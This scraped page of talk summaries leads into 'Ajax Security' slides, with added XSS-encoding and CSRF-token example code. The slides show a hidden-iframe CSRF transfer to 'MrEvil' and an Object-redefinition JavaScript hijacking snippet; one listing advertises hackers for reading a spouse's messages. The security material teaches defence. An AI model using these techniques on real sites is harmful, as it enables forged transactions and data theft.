The document discusses various security vulnerabilities in Ajax applications including CSRF, login CSRF, JavaScript hijacking, XSS, and history stealing. It provides examples of how these attacks can be carried out and emphasizes the importance of validating and sanitizing user input to prevent scripts from being executed maliciously on a site. The document also recommends techniques for protecting against these attacks, such as using authentication tokens and disabling client-side script evaluation for untrusted sources.
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015, by Matt Raible
Many Spring projects exist that leverage XML for their configuration and bean definitions. Most Java web applications use a web.xml to configure their servlets, filters and listeners. This session shows you how you can eliminate XML by configuring your Spring beans with JavaConfig and annotations. It also shows how you can remove your web.xml and configure your web components with Java.
Performance optimization is a crucial aspect of building ‘snappy’ client-side applications and something which all developers using jQuery should bear in mind. In this talk, we're going to take a look at some of the best practices, tips and tricks for improving the performance of your jQuery code in 2011 with some quick wins and a few new surprises along the way.
Progressive Enhancement 2.0 (jQuery Conference SF Bay Area 2011), by Nicholas Zakas
In the beginning, progressive enhancement was simple: HTML layered with CSS layered with JavaScript. That worked fine when there were two browsers, but in today's world of multiple devices and multiple browsers, it's time for a progressive enhancement reboot. At the core is the understanding that the web is not print - the same rules don't apply. As developers and consumers we've been fooled into thinking about print paradigms for too long. In this talk, you'll learn just how different the web is and how the evolution of progressive enhancement can lead to better user experiences as well as happier developers and users.
Do More with HTML 5 and CSS 3 - 16th EDTED - RJ, by Leonardo Balter
Slides presented at the 16th EDTED, Rio de Janeiro edition, on 21 May 2011.
The videos, animations and code that were shown are not included here, but the links are. I will post the full link shortly.
Slides from my talk discussing my experience rebuilding a video player I previously developed in Flash. I gave this talk on March 18th, at the Brisbane Web Design Meetup.
High Performance JavaScript (CapitolJS 2011), by Nicholas Zakas
High Performance JavaScript provides techniques for optimizing JavaScript performance. It discusses how JavaScript execution blocks the browser UI thread, preventing responsive user experiences. It recommends limiting individual JavaScript jobs to under 50ms to avoid unresponsiveness. The document then provides techniques to improve load time performance such as dynamically loading scripts, and runtime techniques like timers and web workers to avoid blocking the UI thread during long-running processes.
The document discusses different approaches to using JavaScript libraries, including plug-and-play widgets, libraries that require some coding, and writing raw JavaScript from scratch. It then examines popular open-source JavaScript libraries like Prototype, jQuery, Yahoo UI, and Dojo, comparing their features, functionality, and widgets. The ideal library should have a robust core feature set along with user interface widgets, active development and support, and good documentation.
This document provides an introduction and overview of JavaScript, including data types, variables, operators, control structures, the Document Object Model (DOM), and debugging techniques. It discusses JavaScript syntax, functions, scopes, arrays, and common language features. It also covers how to include JavaScript in HTML documents, both inline and via external files. The DOM is explained as a way for JavaScript to programmatically access and modify elements in an HTML document.
The document discusses unobtrusive JavaScript and the UJS plugin for Rails. It describes separating JavaScript behavior from HTML content and CSS styling. The UJS plugin allows defining behaviors via CSS selectors and keeping scripts in external files. Examples are given of attaching remote behaviors to links and forms using the UJS plugin.
This document discusses jQuery UI and plugins. It provides an overview of jQuery UI classes that can be used to style elements. It also demonstrates several common jQuery UI widgets like buttons, accordions, dialogs, and tabs. The document discusses jQuery UI effects for animations and transitions. It provides tips for identifying good plugins based on aspects like their API, documentation, support, and community. Overall, the document is an introduction to using jQuery UI and evaluating jQuery plugins.
This is the Google Tech Talk that I gave August 17th, 2007 on building a JavaScript library. I derived much of the talk from my experiences in building the jQuery and FUEL JavaScript libraries.
This document outlines Ugo Cei's presentation "Ruby for Java Programmers". The presentation will cover how to integrate Ruby and Java code, including using bridges like JRuby, XML-RPC, and SOAP. It will also demonstrate sample code for calling Java from Ruby and vice versa. The goal is to help Java programmers learn how Ruby can be used alongside or instead of Java in certain scenarios.
This document summarizes upcoming improvements and new features in web browsers, including Firefox 3.1, Safari 4, Internet Explorer 8, Opera 10, and Google Chrome. Many of the browsers are focusing on better JavaScript performance through new engines like TraceMonkey and V8. New features include process per tab, postMessage for cross-domain communication, HTML5 drag and drop, and the Canvas element for offloading rendering to the client. Overall the browsers are aiming to improve speed, compatibility, and the user experience through these new features and technologies.
This document discusses optimizing Meetup's performance by reducing page load times. It recommends reducing the weight of JavaScript, images, the DOM, and CSS. Specific techniques include externalizing and concatenating JavaScript, lazy loading images and scripts, minimizing DOM elements, writing efficient CSS selectors, and profiling code to optimize loops and DOM manipulation. Reducing page weight through these techniques speeds up load times, which improves the user experience and avoids the drop in member activity that slow pages cause.
This document discusses techniques for improving frontend performance. It recommends making fewer HTTP requests, using a content delivery network, adding expiration headers, gzipping components, optimizing stylesheet and script placement, avoiding redirects and duplicate scripts, and more. It also covers techniques for loading scripts asynchronously without blocking page rendering, such as using script elements, XHR, and iframes. Faster page loads can improve user experience and increase revenue.
This document discusses the transition from YUI3 to K2. It provides a brief history of YUI, describing its goals of code reuse through modular components and submodules. It highlights aspects of YUI3 that make it lighter, easier and faster to use than previous versions, including a more consistent API through the Node utility, language enhancements, dynamic loading, and combo handling for faster loading. The document suggests K2 builds upon these strengths.
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks, by Mario Heiderich
The document discusses JavaScript MVC and templating frameworks and security issues found during penetration testing. Several frameworks were found to execute arbitrary JavaScript from markup in dangerous ways due to overuse of eval-like functions and lack of separation between code and content. This could lead to bypassing of content security policies. Metrics are proposed to evaluate frameworks on security practices like sandboxing and preventing injection into templates. While challenges exist, following best practices like strict separation of code and content could help frameworks improve security.
- The original vision of the World Wide Web was as a hyperlinked document retrieval system, not for presentation, sessions, or interactivity. If it had stayed true to this vision, modern sites like Yahoo would not exist.
- Browser wars in the 1990s led to proprietary technologies that frustrated developers. The introduction of JavaScript in 1995 allowed for dynamic and interactive web pages.
- By the 2000s, Microsoft's Internet Explorer dominated the browser market, bringing some stability through the standardized DOM and the DHTML techniques built on it. However, cross-browser differences still posed challenges for developers.
Dive deep into the internals of Android in this two-part, 150-minute class. You will explore the wonders of Dalvik bytecode, smali syntax, decompilation tools, patching techniques, and common methods you can use to (try to) protect your apps.
Extremely hands-on, you'll be downloading a very popular app, modifying it, and messing around with its behavior. Even if you're not that interested in APK hacking, you'll leave this class with the sort of deep appreciation for Dalvik that makes good Android developers great.
ProbeDroid - Crafting Your Own Dynamic Instrument Tool on Android for App Beh..., by ZongXian Shen
The design memo and hack note of ProbeDroid
A dynamic binary instrumentation kit targeting Android 5.0 (Lollipop) and above.
This is the first complete draft.
An improved version will be uploaded in a few days.
Top 10 mobile security risks - Khổng Văn Cường, by Võ Thái Lâm
The document summarizes the top 10 mobile security risks according to the OWASP Mobile Security Project. It introduces the mobile threat model and discusses each of the top 10 risks, including weak server-side controls, insecure data storage, insufficient transport layer protection, unintentional data leakage, poor authorization and authentication, broken cryptography, client-side injection, security decisions via untrusted inputs, improper session handling, and lack of binary protections. Best practices for addressing these risks are also provided.
This document summarizes a presentation on reverse engineering obfuscated Android applications. It discusses reverse engineering techniques like static and dynamic analysis. It covers analyzing the Android application package (APK) file format and tools like apktool, smali, baksmali, and dex2jar. Common obfuscation techniques like string encryption, call hiding using reflection, and native code are also summarized. The document concludes by recommending further reading on tools and the arms race between attackers and defenders applying obfuscation.
Reverse engineering and instrumentation of Android apps, by Gaurav Lochan
The document discusses different approaches for instrumenting Android apps to add network monitoring capabilities. It describes choosing to modify the app's dex file by disassembling it to Smali code, inserting instrumentation code, and reassembling it. This allows intercepting HTTP calls without requiring access to the app's source code or build process. The key benefits are that it works on any app and Android version without the app's code needing changes.
An exploration of some of the most manicured gardens in the world. There are 36 million active gardeners in Japan, a densely populated country with little space. Gardening is an art-form in Japan but it also gives an insight into the nation's attitude to landscape and therefore provides us with an insight into Japanese landscapes in general. The geographer can derive just as much insight from these gardens as the artist can. Ask your students to watch out for roses and lawns!
This document summarizes a student's learning process for improving their English listening and speaking skills. The student's main goal was to practice speaking English. To work towards this goal, the student used online resources like English Conversational Group and English 4U to practice speaking and learn vocabulary/grammar. The student found English Conversational Group to be the most relevant and positive experience. A negative experience was limited lab hours on campus. Recommended resources included Englishbaby.com and Livemocha.com.
The document describes training techniques and methods, including presenting the topic, explaining subtopics, mastering the topic with audiovisual aids, asking questions, implementing evaluation exercises at three levels, and running the training twice a year.
Employee training and development can benefit both employees and employers in several ways. It can increase job satisfaction, motivation, and productivity among employees. It can also lead to increased efficiencies, financial gains, innovation, and reduced turnover for employers. Training topics include communication, computer skills, customer service, diversity, ethics, and health and safety. Training is available on personal development, managerial skills, and specific competencies and can be initiated for job training, performance improvement, professional development, or succession planning. While most training is currently voluntary, making more training mandatory may better prepare employees and the organization for the future but could face union objections.
Blue Raster Presentation for Earth Observation in the Cloud Demo Day, by Amazon Web Services
Nancy Harris, a research manager at the World Resources Institute, spoke about analyzing data in three dimensions. She emphasized the importance of looking at data from an environmental, social, and economic perspective to better understand complex issues. Considering multiple factors at once allows for a more holistic view that can help address sustainability challenges in a comprehensive manner.
Vector images are scalable as they are based on mathematical formulas, while bitmap images map colors to grids so they are not easily scalable and enlarging distorts lines. Vector files like EPS and AI contain shapes while bitmap files like JPG and PNG are for photos. Embedded images are stored inside documents while linked images remain outside but linked. GIF limits colors to 256 so is best for simple images, while JPEG can show complex color ranges for photos. Lossless compression like ZIP reversibly compresses files without quality loss, unlike JPEG which can lose excess data imperceptibly. PNG overcomes issues with JPEG blurring text and GIF lower quality at high resolutions.
This document summarizes common web application vulnerabilities like SQL injection and cross-site scripting (XSS) for PHP applications. It provides examples of each vulnerability and discusses mitigation strategies like input sanitization, encoding output, and using security frameworks. It also covers other risks like cross-site request forgery (CSRF) and the importance of secure server configurations.
The document provides an introduction to web application security and the Damn Vulnerable Web Application (DVWA). It discusses common web vulnerabilities like cross-site scripting (XSS), SQL injection, and information leakage. It demonstrates how to find and exploit these vulnerabilities in DVWA, including stealing cookies, extracting database information, and creating a backdoor PHP shell. The document is intended to educate users about web security risks and show how hackers can compromise applications.
Application Security for Rich Internet Applications (Jfokus 2012), by johnwilander
The document discusses cross-site scripting (XSS) attacks and cross-site request forgery (CSRF) attacks against rich internet applications. It begins with an overview of XSS attacks, including reflected, stored, and DOM-based XSS. It then demonstrates real examples of XSS vulnerabilities and discusses challenges of properly preventing XSS. The document next covers CSRF attacks, how they work against RESTful APIs, and techniques for mounting multi-step semi-blind CSRF attacks using invisible iframes and timed GET/POST requests in a deterministic manner.
XSS (cross-site scripting) is a client-side vulnerability that allows injection of malicious JavaScript which can then be run on a victim's browser. The document discusses different types of XSS (non-persistent, persistent, DOM-based), examples of how to perform basic and advanced XSS attacks, ways XSS has been used on major websites, and how attackers can exploit XSS vulnerabilities for activities like session hijacking, cookie stealing, clickjacking, and more.
Roberto Bicchierai - Defending web applications from attacks, by Pietro Polsinelli
Is my web application exposed? We will present a short guide for the "contemporary developer" of web apps: we will survey the critical points of our web apps, the database, session stealing, cookies. We will then review the most common attacks from DOS to XSS to CSRF and ways to defend and / or limit damages.
Avoiding Cross Site Scripting - Not as easy as you might think, by Erlend Oftedal
The document discusses avoiding cross-site scripting (XSS) attacks. It notes that while some experts say XSS protection is easy, it can actually be challenging. It provides statistics on how common XSS errors are. It then discusses the risks of XSS attacks, including stealing data from clients or servers and exploiting browsers. It explains different types of XSS attacks and demonstrates examples. The document emphasizes the importance of input validation and output encoding to prevent XSS. It also discusses challenges like DOM-based XSS and provides recommendations for developing secure code.
Cross Site Scripting (XSS) is a vulnerability that allows malicious users to insert client-side code into web pages that is then executed by other users' browsers. This code can steal cookies, access private information, perform actions on the user's behalf, and redirect them to malicious websites. XSS works by having the server reflect or store request input containing malicious JavaScript into a page without encoding it. There are different types of XSS attacks, including non-persistent, persistent, and DOM-based attacks. Prevention methods include validating user input and encoding output for the context it is written into, on both the server side and the client side. Web vulnerability scanners like Burp Suite can help test for XSS and other vulnerabilities.
It's time to deprecate JavaScript. Its security model and the language itself are appalling.
As data moves into the cloud the JavaScript threat is increasing and I believe the only way to fix this is to start all over again. The 14-year-old language and security model aren't up to today's threats.
Rich Web App Security - Keeping your application safe, by Jeremiah Grossman
The document discusses securing web applications from common vulnerabilities like cross-site scripting (XSS) and cross-site request forgery (CSRF). It outlines various techniques attackers use to exploit these issues, such as injecting malicious scripts through user input or forging unauthorized requests. The document then provides recommendations for developers to prevent these attacks, such as validating input, encoding output for its context, and verifying that state-changing requests were actually intended by the user.
The document discusses various techniques for hacking client-side insecurities, including discovering clients on the internet and intranet, attacking client-side through JavaScript jacking and pluggable protocol handlers, exploiting cross-site request forgery vulnerabilities, and fingerprinting clients through analysis of HTTP headers and browser information leaks. The presentation aims to demonstrate these hacking techniques through examples and a question/answer session.
This document summarizes security issues with JavaScript and discusses vulnerabilities like cross-site scripting (XSS) and cross-site request forgery (CSRF). It provides examples of how XSS can be used to steal cookies and hijack sessions. It also discusses challenges with securing JSON responses and preventing code injection attacks. Countermeasures discussed include escaping output, adding random tokens to forms, and using a secure comment syntax to wrap sensitive JSON responses.
XSS (cross-site scripting) is a common web vulnerability that allows attackers to inject client-side scripts. The document discusses various types of XSS attacks and defenses against them. It covers:
1) Reflected/transient XSS occurs when untrusted data in URL parameters is immediately echoed into the response without encoding. Stored/persistent XSS occurs when untrusted data is stored and later displayed. DOM-based XSS occurs when client-side script writes untrusted data (from sources such as location.hash) into the DOM without encoding, so the payload may never reach the server at all.
2) Defenses include HTML/URL encoding untrusted data before displaying it, validating all inputs, and using context-specific encoding for HTML elements, attributes, JavaScript, and URLs.
3) The OWASP Java Encoder Project and Microsoft Anti
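Context-specific encoding, as recommended in this summary and in the two XSS decks above it, as an added example. The code is not from any deck or from the OWASP Java Encoder project; it is a plain JavaScript illustration. It also shows the double-context trap the decks allude to: an inline event handler is first a JavaScript string literal and then an HTML attribute value, and the browser entity-decodes the attribute before the JavaScript engine runs it, so HTML encoding alone is undone. `decodeHtmlAttribute()` is a minimal stand-in for that parser step, written here for the demonstration.

```javascript
// Added example: encoders for three output contexts and the inline-handler trap.

// HTML body text and quoted attribute values.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// JavaScript string literal (inside <script> or an event handler): every
// non-alphanumeric character becomes \xHH or \uHHHH, so no quote, "</script>",
// newline or "&" survives to be reinterpreted by either parser.
function encodeForJs(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// URL query parameter value.
function encodeForUrl(s) {
  return encodeURIComponent(String(s));
}

// The same untrusted value in three contexts, each with its own encoder.
function renderProfile(name) {
  return [
    `<h1>Hello ${encodeForHtml(name)}</h1>`,
    `<a href="/search?q=${encodeForUrl(name)}">search</a>`,
    `<script>var user = '${encodeForJs(name)}';</script>`,
  ].join('\n');
}

// Inline handler: JS encoding first (inner context), HTML encoding second (outer).
function renderHandler(name) {
  return `<a onclick="go('${encodeForHtml(encodeForJs(name))}')">`;
}

// The common mistake: HTML encoding only.
function renderHandlerWrongly(name) {
  return `<a onclick="go('${encodeForHtml(name)}')">`;
}

// Stand-in for what the HTML parser hands to the JavaScript engine for an
// attribute value: numeric and the common named character references decoded.
function decodeHtmlAttribute(s) {
  const named = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };
  return s.replace(/&(?:#x([0-9a-f]+)|#([0-9]+)|([a-z]+));/gi, (m, hex, dec, name) => {
    if (hex) return String.fromCharCode(parseInt(hex, 16));
    if (dec) return String.fromCharCode(parseInt(dec, 10));
    return named[name.toLowerCase()] || m;
  });
}

// The handler's JavaScript source exactly as the browser would execute it.
function handlerSource(markup) {
  const attr = /onclick="([^"]*)"/.exec(markup)[1];
  return decodeHtmlAttribute(attr);
}
```

With the constructed payload `');alert(1);//`, the HTML-only version decodes to `go('');alert(1);//')`, which runs `alert(1)`; the doubly-encoded version decodes to a string literal whose value is the original payload, as data.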
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF, by Mark Stanton
This document discusses common JavaScript security vulnerabilities like cross-site scripting (XSS), cross-site request forgery (CSRF), and clickjacking. It defines these issues and provides examples of real attacks. The document also outlines solutions for developers, including sanitizing input, escaping output, minimizing the attack surface, and designing with the assumption of breaches. Overall it stresses the importance of a holistic, multi-layered approach to JavaScript security.
The document summarizes techniques for preventing clickjacking attacks, including frame busting code, the X-Frame-Options HTTP header, and Content Security Policy. It provides examples of how to implement these techniques and their limitations. It encourages attendees to check their own websites and applications for clickjacking vulnerabilities and ways to secure them against these risks.
Keeping your web application secure is an ongoing process - new classes of vulnerabilities are discovered with surprising frequency, and if you don't keep on top of them you could be in for a nasty surprise. This talk will discuss both common and obscure vulnerabilities, with real-world examples of attacks that have worked against high profile sites in the past.
Introduction to Cross Site Scripting (XSS), by Irfad Imtiaz
Contents :
- Introduction
- Description as A Widely Used Hacking Technique
- How it is used in Hacking
- What can be done with XSS
#XSS, #Hacking, #Security, #CookieStealing, #InternetBug, #HTMLInjection
Sincerely,
Irfad Imtiaz
The DealBook is our annual overview of the Ukrainian tech investment industry. This edition comprehensively covers the full year 2023 and the first deals of 2024.
Scaling Connections in PostgreSQL Postgres Bangalore (PGBLR) Meetup-2 - Mydbops, by Mydbops
This presentation, delivered at the Postgres Bangalore (PGBLR) Meetup-2 on June 29th, 2024, dives deep into connection pooling for PostgreSQL databases. Aakash M, a PostgreSQL Tech Lead at Mydbops, explores the challenges of managing numerous connections and explains how connection pooling optimizes performance and resource utilization.
Key Takeaways:
* Understand why connection pooling is essential for high-traffic applications
* Explore various connection poolers available for PostgreSQL, including pgbouncer
* Learn the configuration options and functionalities of pgbouncer
* Discover best practices for monitoring and troubleshooting connection pooling setups
* Gain insights into real-world use cases and considerations for production environments
This presentation is ideal for:
* Database administrators (DBAs)
* Developers working with PostgreSQL
* DevOps engineers
* Anyone interested in optimizing PostgreSQL performance
Contact info@mydbops.com for PostgreSQL Managed, Consulting and Remote DBA Services
INDIAN AIR FORCE FIGHTER PLANES LIST.pdf, by jackson110191
These fighter aircraft have uses outside of traditional combat situations. They are essential in defending India's territorial integrity, averting dangers, and delivering aid to those in need during natural calamities. Additionally, the IAF improves its interoperability and fortifies international military alliances by working together and conducting joint exercises with other air forces.
How Social Media Hackers Help You to See Your Wife's Message.pdf, by HackersList
In the modern digital era, social media platforms have become integral to our daily lives. These platforms, including Facebook, Instagram, WhatsApp, and Snapchat, offer countless ways to connect, share, and communicate.
Choose our Linux Web Hosting for a seamless and successful online presence, by rajancomputerfbd
Our Linux Web Hosting plans offer unbeatable performance, security, and scalability, ensuring your website runs smoothly and efficiently.
Visit- https://onliveserver.com/linux-web-hosting/
How RPA Helps in the Transportation and Logistics Industry.pptx, by SynapseIndia
Revolutionize your transportation processes with our cutting-edge RPA software. Automate repetitive tasks, reduce costs, and enhance efficiency in the logistics sector with our advanced solutions.
Advanced Techniques for Cyber Security Analysis and Anomaly Detection, by Bert Blevins
Cybersecurity is a major concern in today's connected digital world. Threats to organizations are constantly evolving and have the potential to compromise sensitive information, disrupt operations, and lead to significant financial losses. Traditional cybersecurity techniques often fall short against modern attackers. Therefore, advanced techniques for cyber security analysis and anomaly detection are essential for protecting digital assets. This blog explores these cutting-edge methods, providing a comprehensive overview of their application and importance.
Kief Morris rethinks the infrastructure code delivery lifecycle, advocating for a shift towards composable infrastructure systems. We should shift to designing around deployable components rather than code modules, use more useful levels of abstraction, and drive design and deployment from applications rather than bottom-up, monolithic architecture and delivery.
Coordinate Systems in FME 101 - Webinar Slides, by Safe Software
If you've ever had to analyze a map or GPS data, chances are you've encountered and even worked with coordinate systems. As location data is continually collected and updated through GPS, understanding coordinate systems is increasingly crucial. However, not everyone knows why they exist or how to effectively use them for data-driven insights.
During this webinar, you’ll learn exactly what coordinate systems are and how you can use FME to maintain and transform your data’s coordinate systems in an easy-to-digest way, accurately representing the geographical space that it exists within. During this webinar, you will have the chance to:
- Enhance Your Understanding: Gain a clear overview of what coordinate systems are and their value
- Learn Practical Applications: Why we need datums and projections, plus how units differ between coordinate systems
- Maximize with FME: Understand how FME handles coordinate systems, including a brief summary of the 3 main reprojectors
- Custom Coordinate Systems: Learn how to work with FME and coordinate systems beyond what is natively supported
- Look Ahead: Gain insights into where FME is headed with coordinate systems in the future
Don’t miss the opportunity to improve the value you receive from your coordinate system data, ultimately allowing you to streamline your data analysis and maximize your time. See you there!
Implementations of Fused Deposition Modeling in the real world, by Emerging Tech
The presentation showcases the diverse real-world applications of Fused Deposition Modeling (FDM) across multiple industries:
1. **Manufacturing**: FDM is utilized in manufacturing for rapid prototyping, creating custom tools and fixtures, and producing functional end-use parts. Companies leverage its cost-effectiveness and flexibility to streamline production processes.
2. **Medical**: In the medical field, FDM is used to create patient-specific anatomical models, surgical guides, and prosthetics. Its ability to produce precise and biocompatible parts supports advancements in personalized healthcare solutions.
3. **Education**: FDM plays a crucial role in education by enabling students to learn about design and engineering through hands-on 3D printing projects. It promotes innovation and practical skill development in STEM disciplines.
4. **Science**: Researchers use FDM to prototype equipment for scientific experiments, build custom laboratory tools, and create models for visualization and testing purposes. It facilitates rapid iteration and customization in scientific endeavors.
5. **Automotive**: Automotive manufacturers employ FDM for prototyping vehicle components, tooling for assembly lines, and customized parts. It speeds up the design validation process and enhances efficiency in automotive engineering.
6. **Consumer Electronics**: FDM is utilized in consumer electronics for designing and prototyping product enclosures, casings, and internal components. It enables rapid iteration and customization to meet evolving consumer demands.
7. **Robotics**: Robotics engineers leverage FDM to prototype robot parts, create lightweight and durable components, and customize robot designs for specific applications. It supports innovation and optimization in robotic systems.
8. **Aerospace**: In aerospace, FDM is used to manufacture lightweight parts, complex geometries, and prototypes of aircraft components. It contributes to cost reduction, faster production cycles, and weight savings in aerospace engineering.
9. **Architecture**: Architects utilize FDM for creating detailed architectural models, prototypes of building components, and intricate designs. It aids in visualizing concepts, testing structural integrity, and communicating design ideas effectively.
Each industry example demonstrates how FDM enhances innovation, accelerates product development, and addresses specific challenges through advanced manufacturing capabilities.
The Rise of Supernetwork Data Intensive Computing, by Larry Smarr
Invited Remote Lecture to SC21
The International Conference for High Performance Computing, Networking, Storage, and Analysis
St. Louis, Missouri
November 18, 2021
Paper introduction: A Systematic Survey of Prompt Engineering on Vision-Language Foundation ..., by Toru Tamaki
Jindong Gu, Zhen Han, Shuo Chen, Ahmad Beirami, Bailan He, Gengyuan Zhang, Ruotong Liao, Yao Qin, Volker Tresp, Philip Torr "A Systematic Survey of Prompt Engineering on Vision-Language Foundation Models" arXiv2023
https://arxiv.org/abs/2307.12980
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf, by Neo4j
Presented at Gartner Data & Analytics, London, May 2024. BT Group has used the Neo4j Graph Database to enable impressive digital transformation programs over the last 6 years. By re-imagining their operational support systems to adopt self-serve and data-led principles they have substantially reduced the number of applications and the complexity of their operations. The result has been a substantial reduction in risk and costs while improving time to value, innovation, and process automation. Join this session to hear their story, the lessons they learned along the way and how their future innovation plans include the exploration of uses of EKG + Generative AI.
YOUR RELIABLE WEB DESIGN & DEVELOPMENT TEAM — FOR LASTING SUCCESS
WPRiders is a web development company specialized in WordPress and WooCommerce websites and plugins for customers around the world. The company is headquartered in Bucharest, Romania, but our team members are located all over the world. Our customers are primarily from the US and Western Europe, but we have clients from Australia, Canada and other areas as well.
Some facts about WPRiders and why we are one of the best firms around:
More than 700 five-star reviews! You can check them here.
1500 WordPress projects delivered.
We respond 80% faster than other firms! Data provided by Freshdesk.
We’ve been in business since 2015.
We are located in 7 countries and have 22 team members.
With so many projects delivered, our team knows what works and what doesn’t when it comes to WordPress and WooCommerce.
Our team members are:
- highly experienced developers (employees & contractors with 5 -10+ years of experience),
- great designers with an eye for UX/UI with 10+ years of experience
- project managers with development background who speak both tech and non-tech
- QA specialists
- Conversion Rate Optimisation - CRO experts
They are all working together to provide you with the best possible service. We are passionate about WordPress, and we love creating custom solutions that help our clients achieve their goals.
At WPRiders, we are committed to building long-term relationships with our clients. We believe in accountability, in doing the right thing, as well as in transparency and open communication. You can read more about WPRiders on the About us page.
Best Programming Language for Civil EngineersAwais Yaseen
The integration of programming into civil engineering is transforming the industry. We can design complex infrastructure projects and analyse large datasets. Imagine revolutionizing the way we build our cities and infrastructure, all by the power of coding. Programming skills are no longer just a bonus—they’re a game changer in this era.
Technology is revolutionizing civil engineering by integrating advanced tools and techniques. Programming allows for the automation of repetitive tasks, enhancing the accuracy of designs, simulations, and analyses. With the advent of artificial intelligence and machine learning, engineers can now predict structural behaviors under various conditions, optimize material usage, and improve project planning.
1. Ajax Security
Keeping your application safe
Joe Walker
Copyright SitePen, Inc. 2008. All Rights Reserved
2. 89 out of 10 Websites have serious vulnerabilities
3. Goal: Keep the bad guys out of your website
4. The Attackers
Who is the attacker?
• Troublemakers / Thieves
Who is the victim?
• Your data / Your users / Your partners
5. Agenda
CSRF, Login CSRF
JavaScript Hijacking
XSS
History Stealing
Combination Attacks
Session Fixation + ADP + Clickjacking
6. CSRF (Cross Site Request Forgery)
You can still abuse someone else’s cookies and headers even if you can’t read them
7. Recap: Cross-Domain Rules
www.bank.com:
c = document.cookie;
alert(c);
/* Shows cookies from www.bank.com */
www.evil.com:
c = document.cookie;
alert(c);
/* Shows cookies from www.evil.com */
8. Abusing a Cookie without reading it
www.bank.com:
Welcome to Bank.com
We offer the best rates anywhere in the world, guaranteed. Give us your money and we will look after it in the same way we look after little baby kittens.
www.evil.com:
Welcome to Evil.com
We’ve got lots of warez to give away for freee. Download our stuffs and then come back and get more stuffs. Videoz, Warez, Codez, Mp3s.
<iframe width=0 height=0
src="http://bank.com/transfer?amnt=all&dest=MrEvil"/>
9. CSRF
JavaScript is not always required to exploit a CSRF hole
Often all you need is:
• <iframe src="dangerous_url">
• or <img src="dangerous_url"/>
• or <script src="dangerous_url">
You can’t use XHR because cross-domain rules prevent the request from being sent
10. CSRF
CSRF attacks are write-only (with one exception)
Both GET and POST can be forged
Referrer checking is not a complete fix
It’s not just cookies that get stolen:
• HTTP-Auth headers
• Active Directory Kerberos tokens
11. CSRF - Protection
Not 100% solution:
• Force users to log off
• Check referrer headers (https only)
The only complete solution:
• Include authentication tokens in the body of EVERY request
12. CSRF - Protection
Security tokens in GET requests are not a great idea
(bookmarks, caches, GET is idempotent etc)
POST means forms with hidden fields
• OWASP servlet filter
http://www.owasp.org/index.php/CSRF_Guard
Double-submit cookie pattern (Ajax requests only)
• Read the cookie with Javascript and submit in the body
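Server-side checks for the two token patterns from slides 11 and 12, written as an added example rather than code from the deck or from the OWASP filter it links. The request, session and cookie objects are plain constructed values so the functions run without a web framework, and the token string is made up.

```javascript
// Added example, not code from the slides: server-side checks for the two
// CSRF defences the deck recommends. Request and session objects are plain
// constructed values so the functions run without a web framework.

// Constant-time string comparison: a plain === would let an attacker who can
// time responses learn the token byte by byte.
function constantTimeEqual(a, b) {
  if (typeof a !== 'string' || typeof b !== 'string') return false;
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Minimal Cookie header parser: "sid=42; XSRF-TOKEN=abc" -> { sid: '42', ... }
function parseCookies(header) {
  const jar = {};
  for (const part of (header || '').split(';')) {
    const eq = part.indexOf('=');
    if (eq > 0) jar[part.slice(0, eq).trim()] = part.slice(eq + 1).trim();
  }
  return jar;
}

// Slides 11/12: the token lives in the server-side session and must be
// repeated in the body of every state-changing request. Only POST is
// accepted, so the token never ends up in URLs, bookmarks or caches.
function verifySessionToken(req, session) {
  if (req.method !== 'POST') return false;
  const submitted = req.body && req.body.csrf_token;
  return constantTimeEqual(session.csrfToken, submitted);
}

// Slide 12, double-submit cookie for Ajax: the page's own script reads the
// cookie and copies its value into the body. evil.com can make the browser
// send the cookie (slides 6-9) but cannot read it, so a forged request
// never carries a matching body value.
function verifyDoubleSubmit(req) {
  if (req.method !== 'POST') return false;
  const fromCookie = parseCookies(req.headers.cookie)['XSRF-TOKEN'];
  const fromBody = req.body && req.body.csrf_token;
  if (!fromCookie || !fromBody) return false;
  return constantTimeEqual(fromCookie, fromBody);
}

// Constructed sample traffic; the token value is made up for the example.
const TOKEN = 'c0ffee0bad5eed1234567890abcdef00';
const SESSION = { csrfToken: TOKEN };
// Legitimate form post from bank.com's own page.
const legitForm = { method: 'POST', headers: { cookie: 'sid=42' },
  body: { amnt: '10', dest: 'Alice', csrf_token: TOKEN } };
// The hidden-iframe request from slide 8: cookie present, token absent.
const forgedGet = { method: 'GET', headers: { cookie: 'sid=42' },
  body: { amnt: 'all', dest: 'MrEvil' } };
// Ajax post whose script copied the cookie into the body.
const legitAjax = { method: 'POST', headers: { cookie: 'sid=42; XSRF-TOKEN=' + TOKEN },
  body: { csrf_token: TOKEN } };
// Forged cross-site POST: the browser attaches the cookie, the body cannot match.
const forgedAjax = { method: 'POST', headers: { cookie: 'sid=42; XSRF-TOKEN=' + TOKEN },
  body: { csrf_token: 'guess' } };
```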
14. Login CSRF
If I can make your browser do things behind your back, how about logging you out of some service and back in as me.
What are the possibilities when you think that you are you, but you’re not; you’re me?
15. Login CSRF - Attacks
What can I do?
• See what you search for
• See what books you want to buy
• Read emails that you send
• Steal credit card details through PayPal
• etc
16. Login CSRF - Defense
If submitting over https: use Referrer checking
• Do not assume no referrer is safe
Use authentication tokens in your login form
Watch out for session fixation attacks
• Invalidate the server session on login and re-create it
17. JavaScript Hijacking (or how your GMail contacts were at risk)
Sucking data out of Objects before they’re created
18. JavaScript Hijacking
“CSRF is write-only with one known exception”
Using <script> automatically evaluates the returned script
So if you can just find a way to intercept scripts as they are evaluated ...
19. <script type="text/javascript">
function Object() {
  alert("Hello, World");
}
var x = {};
</script>
20. <script type="text/javascript">
function Object() {
  this.__defineSetter__('wibble', function(x) {
    alert(x);
  });
}
